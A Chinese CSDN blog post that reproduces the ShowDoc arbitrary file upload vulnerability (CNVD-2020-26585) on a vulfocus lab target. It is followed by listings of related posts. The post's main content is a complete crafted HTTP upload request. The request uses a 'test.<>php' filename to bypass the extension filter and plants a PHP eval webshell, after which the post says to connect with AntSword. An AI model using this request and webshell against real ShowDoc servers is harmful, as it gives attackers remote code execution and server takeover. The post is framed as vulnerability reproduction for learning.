showdoc 文件上传 (CNVD-2020-26585)漏洞复现

已于 2024-04-03 09:49:07 修改
阅读量1.8k 收藏
点赞数
文章标签: java 服务器 开发语言
于 2022-09-03 12:59:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42675091/article/details/126676278
版权

1.漏洞描述

        ShowDoc一个非常适合IT团队的在线API文档、技术文档工具。 api_page存在任意文件上传。

2.打开页面直接抓包后改包

0de6cf5bd6bf412daa1f53111c95dcbd.png

 ​​​​​​

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: vulfocus.fofa.so:57700 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 265

----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain

<?php echo '123_test';@eval($_POST[cmd])?>
----------------------------921378126371623762173617--

3.通过回包可以看到文件地址,直接蚁剑连接。

a207d5cdc6264c3ead3592a7bbfbb1ea.png

66b5be24bba941f3afa059ca734f7408.png 

 

 

weixin_42675091
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
showdoc-master.zip
07-28
showdoc-master
ShowDoc文件上传(CNVD-2020-26585)
m0_65150886的博客
01-18 441
通过Showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。ShowDoc 2.8.3以下版本中存在安全漏洞,ShowDoc存在文件上传漏洞,攻击者可以利用漏洞获取服务器权限。1.访问http://ip:port,出现如下页面,开始实验。ShowDoc是一个非常适合IT团队的在线API文档、2.burp抓取该页面包,并修改get请求。
CNVD-2020-10487】记一次漏洞复现过程
Nil的博客
06-11 800
由于早期版本的Tomcat默认开启的AJP服务。端口号为8009,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web上的任意文件。漏洞编号。
ShowDoc文件上传漏洞CNVD-2020-26585
最新发布
m0_57900228的博客
03-20 702
1、先访问链接:http://ip:prot/index.php?s=/home/page/uploadImg 如果出现“ 没有上传的文件!”,说明可能存在漏洞并可以尝试利用。ShowDoc一个非常适合IT团队的在线API文档、技术文档工具。api_page存在任意文件上传。3、文件上传成功(上图),复制链接至蚁剑,将所有的“\”去除。声明:文章仅供安全研究与学习之用,请勿用于非法用途!2、打开页面直接抓包后改包。
showdoc 文件上传cnvd-2020-26585
weixin_51559599的博客
10-27 256
ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。api_page存在任意文件上传.
ShowDoc漏洞学习——CNVD-2020-26585(任意文件上传
记录并分享学习安全的知识点..
07-24 1088
​ ShowDoc一个非常适合IT团队的API文档、技术文档工具。2.8.3以下版本的ShowDoc 存在任意文件上传漏洞,攻击者通过构造特殊的数据包可以上传恶意文件控制服务器
Tomcat CVE-2020-1938(CNVD-2020-10487) 漏洞复现
weixin_43740200的博客
01-27 644
Tomcat CVE-2020-1938(CNVD-2020-10487) 漏洞复现 一、漏洞描述 Tomcat是Apache软件基金会Jakarta 项目中的一个核心项目,作为目前比较流行的Web应用服务器,深受Java爱好者的喜爱,并得到了部分软件开发商的认可。Tomcat服务器是一个免费的开放源代码的Web应用服务器,被普遍使用在轻量级Web应用服务的构架中。 2020年1月6日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的Apache Tomcat文件包含漏洞。Tom
漏洞复现-showdoc-文件上传】​vulfocus/showdoc-cnvd_2020_26585
10-10 1896
【showdoc-文件上传】API_page存在任意文件上传
ShowDoc文件上传CNVD-2020-26585
qq_34341458的博客
04-01 3688
0x01 描述 描述: showdoc一个非常适合IT团队的API文档、技术文档工具。在前台存在文件上传,可以getshell。 0x02 影响范围 fofa搜索语句: app=“ShowDoc” 先访问链接:http://ip:prot/index.php?s=/home/page/uploadImg //文件上传漏洞的链接。如果出现“没有出现上传的文件”,说明可能存在漏洞并可以尝试利用。 0x03 漏洞复现 漏洞地址:http://vulfocus.io/#/dashboard?image_
ShowDoc任意文件上传绕过手法分享
众生度尽,方证菩提
07-16 760
因为你仍能痛苦,所以说明你对生活还抱有希望!
ShowDoc 远程代码执行漏洞
weixin_51387754的博客
11-02 2591
漏洞简介 ShowDoc 是一个非常适合 IT 团队的在线文档分享工具,它可以加快团队之间沟通的效率。 漏洞复现 fofa语句: app=“ShowDoc” 抓包 POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Accept-Encoding:
漏洞复现-showdoc文件上传_v2.8.3_(CNVD-2020-26585)
qq_58683895的博客
10-27 755
ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。api_page存在任意文件上传.然后剔除掉所有的反斜线,使用蚁剑连接。send发送发现返回结果成功。进入首页,然后刷新bp抓包。volfucs靶场复现
swagger-showdoc:一个将swagger的Json文件转换为ShowDoc的小工具
05-01
本项目旨在帮助使用swagger项目的团队,利用现有的swagger.json格式文件来实现文档的自动生成,文档的展示使用了showDoc 软件架构 Spring Boot 2.0.3 JDK 1.8 swagger2markup 1.3.3 okhttp 3.11.0 使用说明 克隆项目...
docker部署showdoc
12-10
docker部署showdoc
showdoc本地搭建文件.rar
09-30
内容包括: 1、PHP运行环境(WAMP)wamp-server-wamp5-2-5-multi-win.zip 2、vcredist_x86(环境文件) 3、showdoc部署代码 以上资源仅为学习使用,如有问题欢迎联系进行修改
showdoc-master
11-09
showdoc用以接口文档管理,方便开发人员在开发过程中记录接口信息,测试人员测试及文档最终归档
showdoc 文件上传漏洞(cnvd-2020-26585)
xy_wjyjw的博客
10-29 172
刷新页面,点击(Intercept is off)开始抓包。打开虚拟终端,输入命令(dir /tmp),查看flag。替换全部报文,修改Host和一句话木马。用蚁剑连接,连接成功,并添加。发送给respones,showdoc 文件上。在bp网页中打开ip(发送到Repeater。
2020-11-01
weixin_52121668的博客
11-01 69
windows快捷键 关闭窗口 Alt+F4 复制 Ctrl+c 粘贴 Ctrl+v 剪贴 Ctrl+x 全选 Ctrl+A 撤销 Ctrl+z 保存 Ctrl+s 任务管理器 Ctrl+shift+Esc Ctrl+Alt+del Ctrl+Alt+Delete Windows 平铺界面 Windows+Tab 运行 Windows+R 我的计算机 Windows+E 切换界面 Alt+Tab Dos命令 盘符切换 C: D: 查看当前目录 Dir 目录切换 只能当前盘内的切换cd空格 盘内盘外都可c
CNVD-2020-46552 深信服EDR远程代码执行漏洞复现
afei001
01-19 909
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.漏洞修复 1.漏洞概述 终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件和管理平台软件共同组成。2020年08月18日左右检测到深信服EDR存在远程代码执行漏洞。该漏洞编号为CNVD-2020-46552。攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。 ...
Linux服务器 部署showdoc
06-14
好的,您可以按照以下步骤来部署 ShowDoc 在 Linux 服务器上: 1. 安装 LAMP 环境:在 Linux 服务器上安装 Apache、MySQL 和 PHP 环境。 2. 下载 ShowDoc:在 ShowDoc 的官网上下载最新的压缩包。 3. 解压 ShowDoc:将下载的压缩包解压到 Apache 的 Web 目录下。 4. 配置数据库:创建一个 MySQL 数据库,并将 ShowDoc 的配置文件中的数据库配置信息修改为对应的值。 5. 创建管理员账号:运行 ShowDoc 提供的脚本来创建一个管理员账号,以便后续的管理工作。 6. 配置 Apache:在 Apache 的配置文件中添加一个虚拟主机,将 ShowDoc 的根目录指定为虚拟主机的 DocumentRoot。 7. 重启 Apache:重启 Apache 服务以使新的配置生效。 8. 访问 ShowDoc:在浏览器中输入虚拟主机的地址,就可以访问 ShowDoc 了。 希望以上步骤能够帮到您。如果您在部署过程中遇到任何问题,可以随时向我提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值